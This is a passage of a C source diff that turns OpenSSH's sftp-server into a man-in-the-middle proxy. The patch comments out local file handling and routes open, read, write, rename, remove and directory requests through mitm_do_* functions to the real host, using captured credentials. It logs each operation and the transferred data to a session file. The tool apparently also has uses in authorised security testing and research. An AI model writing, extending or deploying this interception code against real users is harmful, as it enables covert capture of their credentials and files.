2924. handle_is_ok(int i, int type)
2925. @@ -328,6 +572,7 @@
2926.     return i >= 0 && (u_int)i < num_handles && handles[i].use == type;
2927. }
2928.  
2929. +/*
2930. static int
2931. handle_to_string(int handle, u_char **stringp, int *hlenp)
2932. {
2933. @@ -338,6 +583,7 @@
2934.     *hlenp = sizeof(int32_t);
2935.     return 0;
2936. }
2937. +*/
2938.  
2939. static int
2940. handle_from_string(const u_char *handle, u_int hlen)
2941. @@ -362,6 +608,7 @@
2942.     return NULL;
2943. }
2944.  
2945. +/*
2946. static DIR *
2947. handle_to_dir(int handle)
2948. {
2949. @@ -399,6 +646,7 @@
2950.     if (handle_is_ok(handle, HANDLE_FILE) && bytes > 0)
2951.         handles[handle].bytes_write += bytes;
2952. }
2953. +*/
2954.  
2955. static u_int64_t
2956. handle_bytes_read(int handle)
2957. @@ -416,6 +664,7 @@
2958.     return 0;
2959. }
2960.  
2961. +/*
2962. static int
2963. handle_close(int handle)
2964. {
2965. @@ -434,6 +683,7 @@
2966.     }
2967.     return ret;
2968. }
2969. +*/
2970.  
2971. static void
2972. handle_log_close(int handle, char *emsg)
2973. @@ -461,6 +711,7 @@
2974.             handle_log_close(i, "forced");
2975. }
2976.  
2977. +/*
2978. static int
2979. get_handle(struct sshbuf *queue, int *hp)
2980. {
2981. @@ -476,6 +727,28 @@
2982.     free(handle);
2983.     return 0;
2984. }
2985. +*/
2986. +
2987. +/* Handle return value must be free()'ed. */
2988. +int
2989. +get_handle_all(struct sshbuf *queue, u_char **handle_str, size_t *handle_len, int *handle_int)
2990. +{
2991. +   int r;
2992. +
2993. +   if ((r = sshbuf_get_string(queue, handle_str, handle_len)) != 0)
2994. +     return r;
2995. +
2996. +   if (*handle_len < 256)
2997. +       *handle_int = handle_from_string(*handle_str, *handle_len);
2998. +   else {
2999. +       free(*handle_str); *handle_str = NULL;
3000. +       *handle_len = 0;
3001. +       *handle_int = -1;
3002. +       return -1;
3003. +   }
3004. +
3005. +   return 0;
3006. +}
3007.  
3008. /* send replies */
3009.  
3010. @@ -555,6 +828,7 @@
3011.     send_data_or_handle(SSH2_FXP_DATA, id, data, dlen);
3012. }
3013.  
3014. +/*
3015. static void
3016. send_handle(u_int32_t id, int handle)
3017. {
3018. @@ -566,6 +840,15 @@
3019.     send_data_or_handle(SSH2_FXP_HANDLE, id, string, hlen);
3020.     free(string);
3021. }
3022. +*/
3023. +
3024. +static void
3025. +send_handle_str(u_int32_t id, u_char *handle, size_t handle_len)
3026. +{
3027. +   debug("request %u: sent handle_str handle %d", id, atoi(handle));
3028. +   send_data_or_handle(SSH2_FXP_HANDLE, id, handle, handle_len);
3029. +}
3030. +
3031.  
3032. static void
3033. send_names(u_int32_t id, int count, const Stat *stats)
3034. @@ -678,14 +961,18 @@
3035.     u_int32_t pflags;
3036.     Attrib a;
3037.     char *name;
3038. -   int r, handle, fd, flags, mode, status = SSH2_FX_FAILURE;
3039. +   u_char *handle_str = NULL;
3040. +   size_t handle_len = 0;
3041. +   u_int status = 0;
3042. +   int r;
3043.  
3044.     if ((r = sshbuf_get_cstring(iqueue, &name, NULL)) != 0 ||
3045.         (r = sshbuf_get_u32(iqueue, &pflags)) != 0 || /* portable flags */
3046.         (r = decode_attrib(iqueue, &a)) != 0)
3047.         fatal("%s: buffer error: %s", __func__, ssh_err(r));
3048.  
3049. -   debug3("request %u: open flags %d", id, pflags);
3050. +   debug3("request %u: open \"%s\" flags %d", id, name, pflags);
3051. +   /*
3052.     flags = flags_from_portable(pflags);
3053.     mode = (a.flags & SSH2_FILEXFER_ATTR_PERMISSIONS) ? a.perm : 0666;
3054.     logit("open \"%s\" flags %s mode 0%o",
3055. @@ -711,12 +998,25 @@
3056.     }
3057.     if (status != SSH2_FX_OK)
3058.         send_status(id, status);
3059. +   */
3060. +   handle_str = mitm_do_open(client_conn, name, pflags, &a, &handle_len, &status);
3061. +   if (handle_str != NULL) {
3062. +       debug3("request %u: open \"%s\" returning handle: %d", id, name, handle_from_string(handle_str, handle_len));
3063. +       send_handle_str(id, handle_str, handle_len);
3064. +       mitm_handle_new(MITM_HANDLE_TYPE_FILE, name, pflags, handle_str, handle_len);
3065. +   } else {
3066. +       send_status(id, status);
3067. +       sftp_log(status, "open \"%s\" (Flags: %s)", name, string_from_portable(pflags));
3068. +   }
3069. +
3070. +   free(handle_str);  handle_str = NULL;
3071.     free(name);
3072. }
3073.  
3074. static void
3075. process_close(u_int32_t id)
3076. {
3077. +   /*
3078.     int r, handle, ret, status = SSH2_FX_FAILURE;
3079.  
3080.     if ((r = get_handle(iqueue, &handle)) != 0)
3081. @@ -727,11 +1027,28 @@
3082.     ret = handle_close(handle);
3083.     status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK;
3084.     send_status(id, status);
3085. +   */
3086. +   int r;
3087. +   u_char *handle_str = NULL;
3088. +   size_t handle_len = 0;
3089. +   int handle_int = -1;
3090. +   int status;
3091. +
3092. +   if ((r = get_handle_all(iqueue, &handle_str, &handle_len, &handle_int)) != 0)
3093. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
3094. +   debug3("request %u: close handle %u", id, handle_int);
3095. +   status = mitm_do_close(client_conn, handle_str, handle_len);
3096. +   send_status(id, status);
3097. +
3098. +   sftp_log_close(status, handle_str, handle_len);
3099. +   mitm_handle_close(handle_str, handle_len);
3100. +   free(handle_str); handle_str = NULL;
3101. }
3102.  
3103. static void
3104. process_read(u_int32_t id)
3105. {
3106. +   /*
3107.     u_char buf[64*1024];
3108.     u_int32_t len;
3109.     int r, handle, fd, ret, status = SSH2_FX_FAILURE;
3110. @@ -768,11 +1085,39 @@
3111.     }
3112.     if (status != SSH2_FX_OK)
3113.         send_status(id, status);
3114. +   */
3115. +   int r;
3116. +   u_char *handle_str = NULL;
3117. +   size_t handle_len = 0;
3118. +   int handle_int = -1;
3119. +   u_int32_t read_len;
3120. +   u_int64_t offset;
3121. +   u_int status = 0;
3122. +   u_char *buf = NULL;
3123. +   size_t buf_len = 0;
3124. +
3125. +   if ((r = get_handle_all(iqueue, &handle_str, &handle_len, &handle_int)) != 0 ||
3126. +       (r = sshbuf_get_u64(iqueue, &offset)) != 0 ||
3127. +       (r = sshbuf_get_u32(iqueue, &read_len)) != 0)
3128. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
3129. +
3130. +   debug3("request %u: read (handle %d) off %llu len %d",
3131. +       id, handle_int, (unsigned long long)offset, read_len);
3132. +   buf = mitm_do_read(client_conn, handle_str, handle_len, offset, read_len, &buf_len, &status);
3133. +   if (buf != NULL) {
3134. +       send_data(id, buf, buf_len);
3135. +       mitm_handle_read_write(handle_str, handle_len, offset, buf, buf_len);
3136. +   } else
3137. +       send_status(id, status);
3138. +
3139. +   free(buf); buf = NULL;
3140. +   free(handle_str); handle_str = NULL;
3141. }
3142.  
3143. static void
3144. process_write(u_int32_t id)
3145. {
3146. +   /*
3147.     u_int64_t off;
3148.     size_t len;
3149.     int r, handle, fd, ret, status;
3150. @@ -795,7 +1140,9 @@
3151.             status = errno_to_portable(errno);
3152.             error("process_write: seek failed");
3153.         } else {
3154. +   */
3155. /* XXX ATOMICIO ? */
3156. +   /*
3157.             ret = write(fd, data, len);
3158.             if (ret < 0) {
3159.                 error("process_write: write failed");
3160. @@ -811,21 +1158,44 @@
3161.     }
3162.     send_status(id, status);
3163.     free(data);
3164. +   */
3165. +   int r;
3166. +   u_char *handle_str = NULL;
3167. +   size_t handle_len = 0;
3168. +   int handle_int = -1;
3169. +   u_int64_t offset;
3170. +   u_int status;
3171. +   u_char *buf = NULL;
3172. +   size_t buf_len = 0;
3173. +
3174. +   if ((r = get_handle_all(iqueue, &handle_str, &handle_len, &handle_int)) != 0 ||
3175. +       (r = sshbuf_get_u64(iqueue, &offset)) != 0 ||
3176. +       (r = sshbuf_get_string(iqueue, &buf, &buf_len)) != 0)
3177. +
3178. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
3179. +   debug3("request %u: write (handle %d) off %llu len %zu",
3180. +       id, handle_int, (unsigned long long)offset, buf_len);
3181. +   status = mitm_do_write(client_conn, handle_str, handle_len, offset, buf, buf_len);
3182. +   mitm_handle_read_write(handle_str, handle_len, offset, buf, buf_len);
3183. +   send_status(id, status);
3184. +
3185. +   free(handle_str); handle_str = NULL;
3186. +   free(buf); buf = NULL;
3187. }
3188.  
3189. static void
3190. -process_do_stat(u_int32_t id, int do_lstat)
3191. +process_do_stat(u_int32_t id, int do_lstat_arg)
3192. {
3193. -   Attrib a;
3194. -   struct stat st;
3195.     char *name;
3196.     int r, status = SSH2_FX_FAILURE;
3197. +   Attrib *b;
3198.  
3199.     if ((r = sshbuf_get_cstring(iqueue, &name, NULL)) != 0)
3200.         fatal("%s: buffer error: %s", __func__, ssh_err(r));
3201.  
3202. -   debug3("request %u: %sstat", id, do_lstat ? "l" : "");
3203. -   verbose("%sstat name \"%s\"", do_lstat ? "l" : "", name);
3204. +   debug3("request %u: %sstat", id, do_lstat_arg ? "l" : "");
3205. +   verbose("%sstat name \"%s\"", do_lstat_arg ? "l" : "", name);
3206. +   /*
3207.     r = do_lstat ? lstat(name, &st) : stat(name, &st);
3208.     if (r < 0) {
3209.         status = errno_to_portable(errno);
3210. @@ -836,6 +1206,18 @@
3211.     }
3212.     if (status != SSH2_FX_OK)
3213.         send_status(id, status);
3214. +   */
3215. +   if (do_lstat_arg)
3216. +       b = do_lstat(client_conn, name, 0, &status);
3217. +   else
3218. +       b = do_stat(client_conn, name, 0, &status);
3219. +
3220. +   if (b != NULL)
3221. +       send_attrib(id, b);
3222. +   else
3223. +       send_status(id, status);
3224. +
3225. +   sftp_log_attrib(do_lstat_arg ? "lstat" : "stat", status, name, b);
3226.     free(name);
3227. }
3228.  
3229. @@ -854,10 +1236,14 @@
3230. static void
3231. process_fstat(u_int32_t id)
3232. {
3233. -   Attrib a;
3234. -   struct stat st;
3235. -   int fd, r, handle, status = SSH2_FX_FAILURE;
3236. +   Attrib *a;
3237. +   int status = SSH2_FX_FAILURE;
3238. +   u_char *handle_str = NULL;
3239. +   size_t handle_len = 0;
3240. +   int handle_int = -1;
3241. +   int r;
3242.  
3243. +   /*
3244.     if ((r = get_handle(iqueue, &handle)) != 0)
3245.         fatal("%s: buffer error: %s", __func__, ssh_err(r));
3246.     debug("request %u: fstat \"%s\" (handle %u)",
3247. @@ -875,8 +1261,22 @@
3248.     }
3249.     if (status != SSH2_FX_OK)
3250.         send_status(id, status);
3251. +   */
3252. +   if ((r = get_handle_all(iqueue, &handle_str, &handle_len, &handle_int)) != 0)
3253. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
3254. +
3255. +   debug3("request %u: fstat (handle %u)", id, handle_int);
3256. +   a = mitm_do_fstat(client_conn, handle_str, handle_len, 1, &status);
3257. +   if (a != NULL)
3258. +       send_attrib(id, a);
3259. +   else
3260. +       send_status(id, status);
3261. +
3262. +   sftp_log_handle_attrib("fstat", status, handle_str, handle_len, a);
3263. +   free(handle_str);  handle_str = NULL;
3264. }
3265.  
3266. +/*
3267. static struct timeval *
3268. attrib_to_tv(const Attrib *a)
3269. {
3270. @@ -888,6 +1288,7 @@
3271.     tv[1].tv_usec = 0;
3272.     return tv;
3273. }
3274. +*/
3275.  
3276. static void
3277. process_setstat(u_int32_t id)
3278. @@ -900,7 +1301,8 @@
3279.         (r = decode_attrib(iqueue, &a)) != 0)
3280.         fatal("%s: buffer error: %s", __func__, ssh_err(r));
3281.  
3282. -   debug("request %u: setstat name \"%s\"", id, name);
3283. +   debug3("request %u: setstat name \"%s\"", id, name);
3284. +   /*
3285.     if (a.flags & SSH2_FILEXFER_ATTR_SIZE) {
3286.         logit("set \"%s\" size %llu",
3287.             name, (unsigned long long)a.size);
3288. @@ -932,7 +1334,11 @@
3289.         if (r == -1)
3290.             status = errno_to_portable(errno);
3291.     }
3292. +   */
3293. +   status = mitm_do_setstat(client_conn, name, &a);
3294.     send_status(id, status);
3295. +
3296. +   sftp_log_attrib("setstat", status, name, &a);
3297.     free(name);
3298. }
3299.  
3300. @@ -940,9 +1346,13 @@
3301. process_fsetstat(u_int32_t id)
3302. {
3303.     Attrib a;
3304. -   int handle, fd, r;
3305.     int status = SSH2_FX_OK;
3306. +   u_char *handle_str = NULL;
3307. +   size_t handle_len = 0;
3308. +   int handle_int = -1;
3309. +   int r;
3310.  
3311. +   /*
3312.     if ((r = get_handle(iqueue, &handle)) != 0 ||
3313.         (r = decode_attrib(iqueue, &a)) != 0)
3314.         fatal("%s: buffer error: %s", __func__, ssh_err(r));
3315. @@ -998,12 +1408,23 @@
3316.                 status = errno_to_portable(errno);
3317.         }
3318.     }
3319. +   */
3320. +   if ((r = get_handle_all(iqueue, &handle_str, &handle_len, &handle_int)) != 0 ||
3321. +       (r = decode_attrib(iqueue, &a)) != 0)
3322. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
3323. +
3324. +   debug3("request %u: fsetstat handle %d", id, handle_int);
3325. +   status = mitm_do_fsetstat(client_conn, handle_str, handle_len, &a);
3326.     send_status(id, status);
3327. +
3328. +   sftp_log_handle_attrib("fsetstat", status, handle_str, handle_len, &a);
3329. +   free(handle_str);  handle_str = NULL;
3330. }
3331.  
3332. static void
3333. process_opendir(u_int32_t id)
3334. {
3335. +   /*
3336.     DIR *dirp = NULL;
3337.     char *path;
3338.     int r, handle, status = SSH2_FX_FAILURE;
3339. @@ -1028,12 +1449,31 @@
3340.     }
3341.     if (status != SSH2_FX_OK)
3342.         send_status(id, status);
3343. +   */
3344. +   int r, status = SSH2_FX_FAILURE;
3345. +   char *path;
3346. +   if ((r = sshbuf_get_cstring(iqueue, &path, NULL)) != 0)
3347. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
3348. +
3349. +   debug("request %u: opendir \"%s\"", id, path);
3350. +
3351. +   size_t handle_len = 0;
3352. +   u_char *handle_str = mitm_do_opendir(client_conn, path, &handle_len, &status);
3353. +   if (handle_str != NULL) {
3354. +       debug("request %u: opendir \"%s\" returning handle: %u", id, path, handle_from_string(handle_str, handle_len));
3355. +       send_handle_str(id, handle_str, handle_len);
3356. +       mitm_handle_new(MITM_HANDLE_TYPE_DIR, path, 0, handle_str, handle_len);
3357. +   } else
3358. +       send_status(id, status);
3359. +
3360. +   free(handle_str);  handle_str = NULL;
3361.     free(path);
3362. }
3363.  
3364. static void
3365. process_readdir(u_int32_t id)
3366. {
3367. +   /*
3368.     DIR *dirp;
3369.     struct dirent *dp;
3370.     char *path;
3371. @@ -1060,7 +1500,9 @@
3372.                 nstats *= 2;
3373.                 stats = xreallocarray(stats, nstats, sizeof(Stat));
3374.             }
3375. +   */
3376. /* XXX OVERFLOW ? */
3377. +   /*
3378.             snprintf(pathname, sizeof pathname, "%s%s%s", path,
3379.                 strcmp(path, "/") ? "/" : "", dp->d_name);
3380.             if (lstat(pathname, &st) < 0)
3381. @@ -1069,8 +1511,10 @@
3382.             stats[count].name = xstrdup(dp->d_name);
3383.             stats[count].long_name = ls_file(dp->d_name, &st, 0, 0);
3384.             count++;
3385. +   */
3386.             /* send up to 100 entries in one message */
3387.             /* XXX check packet size instead */
3388. +   /*
3389.             if (count == 100)
3390.                 break;
3391.         }
3392. @@ -1085,6 +1529,32 @@
3393.         }
3394.         free(stats);
3395.     }
3396. +   */
3397. +   u_char *handle_str = NULL;
3398. +   size_t handle_len = 0;
3399. +   int handle_int = -1;
3400. +   int r;
3401. +   int status = 0;
3402. +   u_int count = 0, i = 0;
3403. +   Stat *stats;
3404. +
3405. +   if ((r = get_handle_all(iqueue, &handle_str, &handle_len, &handle_int)) != 0)
3406. +       fatal("%s: buffer error", __func__);
3407. +
3408. +   debug("request %u: readdir(handle %d)", id, handle_int);
3409. +   stats = mitm_do_readdir(client_conn, id, handle_str, handle_len, &count, &status);
3410. +   if (stats == NULL)
3411. +       send_status(id, status);
3412. +   else {
3413. +       send_names(id, count, stats);
3414. +       for (i = 0; i < count; i++) {
3415. +           sftp_log_readdir(handle_str, handle_len, stats[i].long_name);
3416. +           free(stats[i].name); stats[i].name = NULL;
3417. +           free(stats[i].long_name); stats[i].long_name = NULL;
3418. +       }
3419. +       free(stats); stats = NULL;
3420. +   }
3421. +   free(handle_str); handle_str = NULL;
3422. }
3423.  
3424. static void
3425. @@ -1098,9 +1568,15 @@
3426.  
3427.     debug3("request %u: remove", id);
3428.     logit("remove name \"%s\"", name);
3429. +   /*
3430.     r = unlink(name);
3431.     status = (r == -1) ? errno_to_portable(errno) : SSH2_FX_OK;
3432.     send_status(id, status);
3433. +   */
3434. +   status = mitm_do_rm(client_conn, name);
3435. +   send_status(id, status);
3436. +
3437. +   sftp_log(status, "rm \"%s\"", name);
3438.     free(name);
3439. }
3440.  
3441. @@ -1119,9 +1595,15 @@
3442.         a.perm & 07777 : 0777;
3443.     debug3("request %u: mkdir", id);
3444.     logit("mkdir name \"%s\" mode 0%o", name, mode);
3445. +   /*
3446.     r = mkdir(name, mode);
3447.     status = (r == -1) ? errno_to_portable(errno) : SSH2_FX_OK;
3448.     send_status(id, status);
3449. +   */
3450. +   status = mitm_do_mkdir(client_conn, name, &a);
3451. +   send_status(id, status);
3452. +
3453. +   sftp_log(status, "mkdir \"%s\" (mode: 0%o)", name, mode);
3454.     free(name);
3455. }
3456.  
3457. @@ -1136,18 +1618,26 @@
3458.  
3459.     debug3("request %u: rmdir", id);
3460.     logit("rmdir name \"%s\"", name);
3461. +   /*
3462.     r = rmdir(name);
3463.     status = (r == -1) ? errno_to_portable(errno) : SSH2_FX_OK;
3464.     send_status(id, status);
3465. +   */
3466. +   status = mitm_do_rmdir(client_conn, name);
3467. +   send_status(id, status);
3468. +
3469. +   sftp_log(status, "rmdir \"%s\"", name);
3470.     free(name);
3471. }
3472.  
3473. static void
3474. process_realpath(u_int32_t id)
3475. {
3476. -   char resolvedname[PATH_MAX];
3477.     char *path;
3478.     int r;
3479. +   char *realpath;
3480. +   Stat s;
3481. +   u_int status;
3482.  
3483.     if ((r = sshbuf_get_cstring(iqueue, &path, NULL)) != 0)
3484.         fatal("%s: buffer error: %s", __func__, ssh_err(r));
3485. @@ -1158,6 +1648,7 @@
3486.     }
3487.     debug3("request %u: realpath", id);
3488.     verbose("realpath \"%s\"", path);
3489. +   /*
3490.     if (realpath(path, resolvedname) == NULL) {
3491.         send_status(id, errno_to_portable(errno));
3492.     } else {
3493. @@ -1166,6 +1657,17 @@
3494.         s.name = s.long_name = resolvedname;
3495.         send_names(id, 1, &s);
3496.     }
3497. +   */
3498. +   realpath = do_realpath(client_conn, path, &status);
3499. +   if (status == SSH2_FX_OK) {
3500. +     attrib_clear(&s.attrib);
3501. +     s.name = s.long_name = realpath;
3502. +     send_names(id, 1, &s);
3503. +   } else
3504. +     send_status(id, status);
3505. +
3506. +   sftp_log(status, "realpath \"%s\" (Result: %s)", path, realpath != NULL ? realpath : "(NULL)");
3507. +   free(realpath); realpath = NULL;
3508.     free(path);
3509. }
3510.  
3511. @@ -1174,7 +1676,6 @@
3512. {
3513.     char *oldpath, *newpath;
3514.     int r, status;
3515. -   struct stat sb;
3516.  
3517.     if ((r = sshbuf_get_cstring(iqueue, &oldpath, NULL)) != 0 ||
3518.         (r = sshbuf_get_cstring(iqueue, &newpath, NULL)) != 0)
3519. @@ -1182,11 +1683,14 @@
3520.  
3521.     debug3("request %u: rename", id);
3522.     logit("rename old \"%s\" new \"%s\"", oldpath, newpath);
3523. +   /*
3524.     status = SSH2_FX_FAILURE;
3525.     if (lstat(oldpath, &sb) == -1)
3526.         status = errno_to_portable(errno);
3527.     else if (S_ISREG(sb.st_mode)) {
3528. +   */
3529.         /* Race-free rename of regular files */
3530. +   /*
3531.         if (link(oldpath, newpath) == -1) {
3532.             if (errno == EOPNOTSUPP || errno == ENOSYS
3533. #ifdef EXDEV
3534. @@ -1198,10 +1702,12 @@
3535.                 ) {
3536.                 struct stat st;
3537.  
3538. +   */
3539.                 /*
3540.                  * fs doesn't support links, so fall back to
3541.                  * stat+rename.  This is racy.
3542.                  */
3543. +   /*
3544.                 if (stat(newpath, &st) == -1) {
3545.                     if (rename(oldpath, newpath) == -1)
3546.                         status =
3547. @@ -1214,7 +1720,9 @@
3548.             }
3549.         } else if (unlink(oldpath) == -1) {
3550.             status = errno_to_portable(errno);
3551. +   */
3552.             /* clean spare link */
3553. +   /*
3554.             unlink(newpath);
3555.         } else
3556.             status = SSH2_FX_OK;
3557. @@ -1224,7 +1732,11 @@
3558.         else
3559.             status = SSH2_FX_OK;
3560.     }
3561. +   */
3562. +   status = mitm_do_rename(client_conn, oldpath, newpath, 1);
3563.     send_status(id, status);
3564. +
3565. +   sftp_log(status, "rename \"%s\" \"%s\"", oldpath, newpath);
3566.     free(oldpath);
3567.     free(newpath);
3568. }
3569. @@ -1232,15 +1744,18 @@
3570. static void
3571. process_readlink(u_int32_t id)
3572. {
3573. -   int r, len;
3574. -   char buf[PATH_MAX];
3575. +   int r;
3576.     char *path;
3577. +   u_int status = 0;
3578. +   char *filename = NULL, *long_name = NULL;
3579. +   Attrib a;
3580.  
3581.     if ((r = sshbuf_get_cstring(iqueue, &path, NULL)) != 0)
3582.         fatal("%s: buffer error: %s", __func__, ssh_err(r));
3583.  
3584.     debug3("request %u: readlink", id);
3585.     verbose("readlink \"%s\"", path);
3586. +   /*
3587.     if ((len = readlink(path, buf, sizeof(buf) - 1)) == -1)
3588.         send_status(id, errno_to_portable(errno));
3589.     else {
3590. @@ -1251,6 +1766,19 @@
3591.         s.name = s.long_name = buf;
3592.         send_names(id, 1, &s);
3593.     }
3594. +   */
3595. +   if (mitm_do_readlink(client_conn, path, &status, &filename, &long_name, &a) == 1) {
3596. +       Stat s;
3597. +       s.name = filename;
3598. +       s.long_name = long_name;
3599. +       s.attrib = a;
3600. +       send_names(id, 1, &s);
3601. +   } else
3602. +       send_status(id, status);
3603. +
3604. +   sftp_log_attrib("readlink", status, path, &a);
3605. +   free(filename); filename = NULL;
3606. +   free(long_name); long_name = NULL;
3607.     free(path);
3608. }
3609.  
3610. @@ -1267,9 +1795,14 @@
3611.     debug3("request %u: symlink", id);
3612.     logit("symlink old \"%s\" new \"%s\"", oldpath, newpath);
3613.     /* this will fail if 'newpath' exists */
3614. +   /*
3615.     r = symlink(oldpath, newpath);
3616.     status = (r == -1) ? errno_to_portable(errno) : SSH2_FX_OK;
3617. +   */
3618. +   status = mitm_do_symlink(client_conn, oldpath, newpath);
3619.     send_status(id, status);
3620. +
3621. +   sftp_log(status, "ln -s \"%s\" \"%s\"", oldpath, newpath);
3622.     free(oldpath);
3623.     free(newpath);
3624. }
3625. @@ -1286,9 +1819,14 @@
3626.  
3627.     debug3("request %u: posix-rename", id);
3628.     logit("posix-rename old \"%s\" new \"%s\"", oldpath, newpath);
3629. +   /*
3630.     r = rename(oldpath, newpath);
3631.     status = (r == -1) ? errno_to_portable(errno) : SSH2_FX_OK;
3632. +   */
3633. +   status = mitm_do_rename(client_conn, oldpath, newpath, 0);
3634.     send_status(id, status);
3635. +
3636. +   sftp_log(status, "posix_rename \"%s\" \"%s\"", oldpath, newpath);
3637.     free(oldpath);
3638.     free(newpath);
3639. }
3640. @@ -1299,29 +1837,41 @@
3641.     char *path;
3642.     struct statvfs st;
3643.     int r;
3644. +   u_int status = 0;
3645.  
3646.     if ((r = sshbuf_get_cstring(iqueue, &path, NULL)) != 0)
3647.         fatal("%s: buffer error: %s", __func__, ssh_err(r));
3648.     debug3("request %u: statvfs", id);
3649.     logit("statvfs \"%s\"", path);
3650.  
3651. +   /*
3652.     if (statvfs(path, &st) != 0)
3653.         send_status(id, errno_to_portable(errno));
3654.     else
3655.         send_statvfs(id, &st);
3656. +   */
3657. +   if (mitm_do_statvfs(client_conn, path, &st, &status) != -1)
3658. +       send_statvfs(id, &st);
3659. +   else
3660. +       send_status(id, status);
3661. +
3662. +   sftp_log_statvfs(status, path, &st);
3663.         free(path);
3664. }
3665.  
3666. static void
3667. process_extended_fstatvfs(u_int32_t id)
3668. {
3669. -   int r, handle, fd;
3670. +   int r, handle_int;
3671.     struct statvfs st;
3672. +   u_int status = 0;
3673. +   u_char *handle_str = NULL;
3674. +   size_t handle_len = 0;
3675.  
3676. +   /*
3677.     if ((r = get_handle(iqueue, &handle)) != 0)
3678.         fatal("%s: buffer error: %s", __func__, ssh_err(r));
3679. -   debug("request %u: fstatvfs \"%s\" (handle %u)",
3680. -       id, handle_to_name(handle), handle);
3681. +
3682.     if ((fd = handle_to_fd(handle)) < 0) {
3683.         send_status(id, SSH2_FX_FAILURE);
3684.         return;
3685. @@ -1330,6 +1880,19 @@
3686.         send_status(id, errno_to_portable(errno));
3687.     else
3688.         send_statvfs(id, &st);
3689. +   */
3690. +
3691. +   if ((r = get_handle_all(iqueue, &handle_str, &handle_len, &handle_int)) != 0)
3692. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
3693. +
3694. +   debug3("request %u: fstatvfs (handle %u)", id, handle_int);
3695. +   if (mitm_do_fstatvfs(client_conn, handle_str, handle_len, &st, &status) != -1)
3696. +       send_statvfs(id, &st);
3697. +   else
3698. +       send_status(id, status);
3699. +
3700. +   sftp_log_fstatvfs(status, handle_str, handle_len, &st);
3701. +   free(handle_str); handle_str = NULL;
3702. }
3703.  
3704. static void
3705. @@ -1344,9 +1907,14 @@
3706.  
3707.     debug3("request %u: hardlink", id);
3708.     logit("hardlink old \"%s\" new \"%s\"", oldpath, newpath);
3709. +   /*
3710.     r = link(oldpath, newpath);
3711.     status = (r == -1) ? errno_to_portable(errno) : SSH2_FX_OK;
3712. +   */
3713. +   status = mitm_do_hardlink(client_conn, oldpath, newpath);
3714.     send_status(id, status);
3715. +
3716. +   sftp_log(status, "ln \"%s\" \"%s\"", oldpath, newpath);
3717.     free(oldpath);
3718.     free(newpath);
3719. }
3720. @@ -1354,19 +1922,31 @@
3721. static void
3722. process_extended_fsync(u_int32_t id)
3723. {
3724. -   int handle, fd, r, status = SSH2_FX_OP_UNSUPPORTED;
3725. +   int handle_int, r, status = SSH2_FX_OP_UNSUPPORTED;
3726. +   u_char *handle_str = NULL;
3727. +   size_t handle_len = 0;
3728.  
3729. +   /*
3730.     if ((r = get_handle(iqueue, &handle)) != 0)
3731.         fatal("%s: buffer error: %s", __func__, ssh_err(r));
3732. -   debug3("request %u: fsync (handle %u)", id, handle);
3733. -   verbose("fsync \"%s\"", handle_to_name(handle));
3734. +   */
3735. +   if ((r = get_handle_all(iqueue, &handle_str, &handle_len, &handle_int)) != 0)
3736. +       fatal("%s: buffer error: %s", __func__, ssh_err(r));
3737. +
3738. +   debug3("request %u: fsync (handle %u)", id, handle_int);
3739. +   /*
3740.     if ((fd = handle_to_fd(handle)) < 0)
3741.         status = SSH2_FX_NO_SUCH_FILE;
3742.     else if (handle_is_ok(handle, HANDLE_FILE)) {
3743.         r = fsync(fd);
3744.         status = (r == -1) ? errno_to_portable(errno) : SSH2_FX_OK;
3745.     }
3746. +   */
3747. +   status = mitm_do_fsync(client_conn, handle_str, handle_len);
3748.     send_status(id, status);
3749. +
3750. +   sftp_log_fsync(status, handle_str, handle_len);
3751. +   free(handle_str); handle_str = NULL;
3752. }
3753.  
3754. static void
3755. @@ -1474,6 +2054,10 @@
3756. void
3757. sftp_server_cleanup_exit(int i)
3758. {
3759. +   write(session_log_fd, "</pre></html>", 13);
3760. +   fdatasync(session_log_fd);
3761. +   close(session_log_fd);
3762. +
3763.     if (pw != NULL && client_addr != NULL) {
3764.         handle_log_exit();
3765.         logit("session closed for local user %s from [%s]",
3766. @@ -1485,19 +2069,17 @@
3767. static void
3768. sftp_server_usage(void)
3769. {
3770. -   extern char *__progname;
3771. -
3772.     fprintf(stderr,
3773.         "usage: %s [-ehR] [-d start_directory] [-f log_facility] "
3774.         "[-l log_level]\n\t[-P blacklisted_requests] "
3775.         "[-p whitelisted_requests] [-u umask]\n"
3776.         "       %s -Q protocol_feature\n",
3777. -       __progname, __progname);
3778. +       "/usr/libexec/sftp-server", "/usr/libexec/sftp-server");
3779.     exit(1);
3780. }
3781.  
3782. int
3783. -sftp_server_main(int argc, char **argv, struct passwd *user_pw)
3784. +sftp_server_main(int argc, char **argv, struct passwd *user_pw, char *original_host, unsigned short original_port, char *username, char *password_and_fingerprint_socket_name, char *log_filepath, char *log_dir)
3785. {
3786.     fd_set *rset, *wset;
3787.     int i, r, in, out, max, ch, skipargs = 0, log_stderr = 0;
3788. @@ -1553,10 +2135,12 @@
3789.                 error("Invalid log facility \"%s\"", optarg);
3790.             break;
3791.         case 'd':
3792. +           /*
3793.             cp = tilde_expand_filename(optarg, user_pw->pw_uid);
3794.             homedir = percent_expand(cp, "d", user_pw->pw_dir,
3795.                 "u", user_pw->pw_name, (char *)NULL);
3796.             free(cp);
3797. +           */
3798.             break;
3799.         case 'p':
3800.             if (request_whitelist != NULL)
3801. @@ -1583,6 +2167,7 @@
3802.     }
3803.  
3804.     log_init(__progname, log_level, log_facility, log_stderr);
3805. +   mitm_init_log(log_filepath, log_dir);
3806.  
3807.     /*
3808.      * On platforms where we can, avoid making /proc/self/{mem,maps}
3809. @@ -1638,6 +2223,7 @@
3810.         }
3811.     }
3812.  
3813. +   client_conn = make_connection(original_host, original_port, username, password_and_fingerprint_socket_name);
3814.     set_size = howmany(max + 1, NFDBITS) * sizeof(fd_mask);
3815.     for (;;) {
3816.         memset(rset, 0, set_size);
3817. @@ -1706,3 +2292,340 @@
3818.                 __func__, ssh_err(r));
3819.     }
3820. }
3821. +
3822. +/* Copied from sftp.c. */
3823. +/* ARGSUSED */
3824. +static void
3825. +killchild(int signo)
3826. +{
3827. +   if (sshpid > 1) {
3828. +       kill(sshpid, SIGTERM);
